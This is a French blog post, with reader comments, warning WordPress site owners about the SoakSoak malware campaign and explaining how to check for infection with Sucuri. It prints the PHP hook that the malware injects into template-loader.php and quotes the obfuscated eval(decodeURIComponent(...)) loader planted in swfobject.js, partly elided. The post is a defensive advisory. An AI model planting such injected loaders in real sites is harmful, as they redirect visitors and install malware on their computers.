Home / Wordpress / Alerte!!! Virus WordPress SoakSoak.

Alerte!!! Virus WordPress SoakSoak.

Les sites WordPress sont actuellement la cible d’un virus/script baptisé SoakSoak. Actuellement se sont près de 100.000 blogs Wordpress d’infectés et Google vient de blacklister 11.000 noms de domaine.

soaksoak_1

Si votre blog est infecté, les visiteurs seront redirigés de façon aléatoires vers des pages web du site soaksoak.ru.

Si votre navigateur ou votre anti-virus ne bloque pas cette redirection alors un fichier sera automatiquement téléchargé pour installer des logiciels malveillants sur votre ordinateur, bien sûr le tout automatiquement et à votre insu.

soaksoak_2

Sur un site WordPress, cela se manifeste par la modification du fichier wp-include/template-loader.php en y rajoutant le script suivant :

[php]function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", ‘FuncQueueObject’);[/php]

Tout ceci pour exécuter un code javascript qui se trouve dans : wp-includes/js/swfobject.js pour qu’il se charge sur chaque page visitée en injectant le malware suivant :

[php]eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));[/php]

Par sécurité, inspecter ces 2 fichiers et lancer aussi un test gratuit via le site web Sucuri.net depuis cette adresse : http://sitecheck.sucuri.net.

J’avais déjà fait un tutoriel sur l’utilisation de ce service, vous le retrouverez à cette adresse : https://quick-tutoriel.com/332-comment-verifier-rapidement-l’integrite-de-votre-blog-wordpress/

  • Si votre blog est clean, vous aurez alors ce résultat :

soaksoak_3

  • Si votre blog est compromis vous aurez alors ce type de message :

soaksoak_4

Je vous conseille de rester attentif les jours qui viennent et de vérifier de temps en temps via le site Sucuri ou manuellement si vous n’êtes pas infecté pour éviter d’être blacklisté par Google mais aussi pour ne pas diffuser ce genre de malware. On attend avec impatience un correctif ou une technique pour bloquer ce genre d’attaque.

Source: http://thehackernews.com

That’s All.

4 Potins

  1. Bonjour,

    Non pas forcément, il suffit de supprimer le fichier .js ainsi que l’appel de ce fichier dans template-loader.php.

    Ensuite il faut comprendre comment une personne à pu injecter ce fichier sur votre hébergement.

    Généralement on met à jour wordpress et ces plugins, on désactive les plugins inutiles, on demande à son hébergeur d’augmenter la sécurité de son compte.

    Voila.

  2. Bonjour,

    Merci pour cet article très clair. Si j’ai bien compris, une fois que le site est infecté par ce virus, la seule solution consiste à recréer un site ?

    Je vous remercie d’avance,

  3. Bonjour,

    le virus rajoute du code au fichier swfobject.js de WordPress.

    SWFObject est un petit script Javascript utilisé pour inclure un contenu swf dans une page HTML. Le script peut détecter le plug-in Flash dans tous les principaux navigateurs (sur MAC et PC) et est conçu pour rendre l'intégration des swf aussi simple que possible.

    @10Playweb : La coquille est réparée. Merci.

    @+

  4. Bonjour,

    Merci pour l’info. Juste une précision, le fichier js est plutôt swfobject.js ou c’est différent ?

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

at suscipit et, mi, Aliquam luctus Donec Sed ante. ut
Partagez8
Tweetez7
+11
Enregistrer1
Reddit
Partagez3
Pocket
20 Partages
QuickTutoriel

GRATUIT
VOIR